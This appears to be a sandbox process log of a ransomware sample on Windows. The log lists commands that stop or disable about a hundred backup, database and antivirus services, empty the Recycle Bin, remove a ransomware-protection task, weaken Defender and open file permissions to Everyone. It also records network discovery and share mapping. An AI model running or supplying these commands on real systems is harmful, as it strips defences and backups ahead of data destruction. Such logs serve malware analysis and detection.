-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeSA /y2⤵PID:5880
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop UI0Detect /y2⤵PID:5872
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵PID:5864
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵PID:5856
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵PID:5844
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵PID:5836
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeMTA /y2⤵PID:5828
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SstpSvc /y2⤵PID:5820
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msftesql$PROD /y2⤵PID:5812
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵PID:5804
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵PID:5796
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SMTPSvc /y2⤵PID:5788
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵PID:5780
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeMGMT /y2⤵PID:5772
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop POP3Svc /y2⤵PID:5764
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer110 /y2⤵PID:5756
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵PID:5748
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer /y2⤵PID:5740
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SamSs /y2⤵PID:5732
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵PID:5724
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeIS /y2⤵PID:5716
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetMsmqActivator /y2⤵PID:5708
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer100 /y2⤵PID:5700
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQL Backups /y2⤵PID:5692
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵PID:5684
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EraserSvc11710 /y2⤵PID:5676
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Agent” /y2⤵PID:5668
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeES /y2⤵PID:5660
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop IISAdmin /y2⤵PID:5652
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer /y2⤵PID:5644
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵PID:5636
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y2⤵PID:5628
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:5620
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:5612
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:5604
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:5596
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:5588
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:5580
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:5572
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:5564
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:5556
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:5548
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:5540
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵PID:5532
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y2⤵PID:5520
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:5512
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:5504
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:5496
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:5488
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:5480
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:5472
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooIT /y2⤵PID:5464
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooBackup /y2⤵PID:5452
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:5444
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mozyprobackup /y2⤵PID:5156
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ekrn /y2⤵PID:4580
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c net view2⤵PID:3556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol2⤵
- Drops file in Windows directory
PID:3708 -
C:\Users\Admin\AppData\Local\Temp\E400951F-772B-4720-AB18-1F2CB8D61839\dismhost.exeC:\Users\Admin\AppData\Local\Temp\E400951F-772B-4720-AB18-1F2CB8D61839\dismhost.exe {D09F0F3F-8584-4463-A958-34A8BDA6AB5A}3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:13100
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EhttpSrv /y2⤵PID:3676
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵PID:3080
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:4332
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵PID:3844
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵PID:1432
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start SSDPSRV /y2⤵PID:2980
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:4496
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:3080
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:3796
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:2996
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:2148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:948
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:16904
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.127.1.372⤵PID:15836
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp2717.bat2⤵PID:5536
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:5860
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" \\10.127.1.37\Users\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:5468
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost1⤵PID:4572
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y1⤵PID:9244
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub1⤵PID:9204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y1⤵PID:9152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵PID:14040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y1⤵PID:14664
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y1⤵PID:15848
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y1⤵PID:15840
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y1⤵PID:15832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y1⤵PID:15824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y1⤵PID:15912
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y1⤵PID:15816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y1⤵PID:15808
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y1⤵PID:16000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y1⤵PID:15992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y1⤵PID:15984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y1⤵PID:15976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y1⤵PID:15800
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y1⤵PID:15792
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y1⤵PID:15784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y1⤵PID:15776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y1⤵PID:15768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y1⤵PID:15760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y1⤵PID:15752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y1⤵PID:15744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y1⤵PID:15736
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y1⤵PID:15728
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y1⤵PID:15720
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y1⤵PID:15712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y1⤵PID:15704
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y1⤵PID:15696
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y1⤵PID:15688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y1⤵PID:15680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y1⤵PID:15672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y1⤵PID:15664
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y1⤵PID:16140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y1⤵PID:16132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y1⤵PID:16124
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵PID:16112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y1⤵PID:16104
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵PID:16096
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y1⤵PID:15656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y1⤵PID:15648
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y1⤵PID:15640
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y1⤵PID:15632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y1⤵PID:15624
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y1⤵PID:15616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y1⤵PID:15608
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y1⤵PID:15600
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y1⤵PID:15592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y1⤵PID:15580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y1⤵PID:15576
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y1⤵PID:15568
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y1⤵PID:15560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y1⤵PID:15492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y1⤵PID:15460
-
C:\Windows\system32\net.exenet view1⤵
- Discovers systems in the same network
PID:17552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y1⤵PID:15452
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y1⤵PID:15444
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y1⤵PID:15436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵PID:15428
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y1⤵PID:15420
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y1⤵PID:15412
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y1⤵PID:15404
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y1⤵PID:15396
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y1⤵PID:15388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y1⤵PID:15380
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y1⤵PID:15372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y1⤵PID:15364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y1⤵PID:13100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y1⤵PID:13772
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y1⤵PID:636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y1⤵PID:656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y1⤵PID:15352
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y1⤵PID:15344
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵PID:15336
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y1⤵PID:15328
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y1⤵PID:15320
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y1⤵PID:15312
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵PID:15304
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y1⤵PID:15296
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y1⤵PID:15288
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y1⤵PID:15280
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y1⤵PID:15272
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y1⤵PID:15264
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y1⤵PID:15256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y1⤵PID:15248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y1⤵PID:15240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y1⤵PID:15232
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵PID:15224
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y1⤵PID:15216
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y1⤵PID:15208
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y1⤵PID:15200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y1⤵PID:15192
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y1⤵PID:15184
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y1⤵PID:15176
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y1⤵PID:15168
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y1⤵PID:15160
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y1⤵PID:15152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y1⤵PID:15144
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y1⤵PID:15136
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y1⤵PID:15128
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y1⤵PID:15120
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y1⤵PID:15112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y1⤵PID:15104
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y1⤵PID:15096
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y1⤵PID:15088
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y1⤵PID:15080
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y1⤵PID:15072
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y1⤵PID:15064
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y1⤵PID:15056
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y1⤵PID:15048
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y1⤵PID:15040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y1⤵PID:15032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y1⤵PID:15024
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y1⤵PID:15016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y1⤵PID:15008
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y1⤵PID:15000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y1⤵PID:14992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y1⤵PID:14984
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y1⤵PID:14976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y1⤵PID:14968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y1⤵PID:14960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y1⤵PID:14952
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y1⤵PID:14944
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y1⤵PID:14936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y1⤵PID:14928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y1⤵PID:14920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵PID:14912
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y1⤵PID:14904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y1⤵PID:14896
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y1⤵PID:14888
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y1⤵PID:14880
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y1⤵PID:14872
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y1⤵PID:14720
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y1⤵PID:14712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y1⤵PID:14704
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y1⤵PID:14696
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵PID:14688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y1⤵PID:14656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y1⤵PID:14648
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y1⤵PID:14640
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /1⤵PID:14632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵PID:14624
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y1⤵PID:14616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵PID:14608
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵PID:14600
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y1⤵PID:14592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y1⤵PID:14584
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y1⤵PID:14576
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y1⤵PID:14568
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y1⤵PID:14560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y1⤵PID:14552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y1⤵PID:14544
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵PID:14528
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y1⤵PID:14520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y1⤵PID:14512
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵PID:14504
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵PID:14496
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y1⤵PID:14488
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y1⤵PID:14480
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y1⤵PID:14472
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y1⤵PID:14464
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y1⤵PID:14456
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y1⤵PID:14448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y1⤵PID:14440
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y1⤵PID:14432
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y1⤵PID:14424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y1⤵PID:14416
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y1⤵PID:14408
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y1⤵PID:14400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y1⤵PID:14392
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y1⤵PID:14384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y1⤵PID:14376
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y1⤵PID:14368
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y1⤵PID:14360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y1⤵PID:14352
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y1⤵PID:14344
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y1⤵PID:12364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y1⤵PID:12360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y1⤵PID:1308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y1⤵PID:1872
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y1⤵PID:2968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y1⤵PID:616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y1⤵PID:4080
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y1⤵PID:10048
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y1⤵PID:2108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y1⤵PID:1088
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y1⤵PID:3048
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y1⤵PID:14332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y1⤵PID:14324
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y1⤵PID:14316
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y1⤵PID:14308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y1⤵PID:14300
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y1⤵PID:14292
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y1⤵PID:14284
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y1⤵PID:14268
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y1⤵PID:14260
-
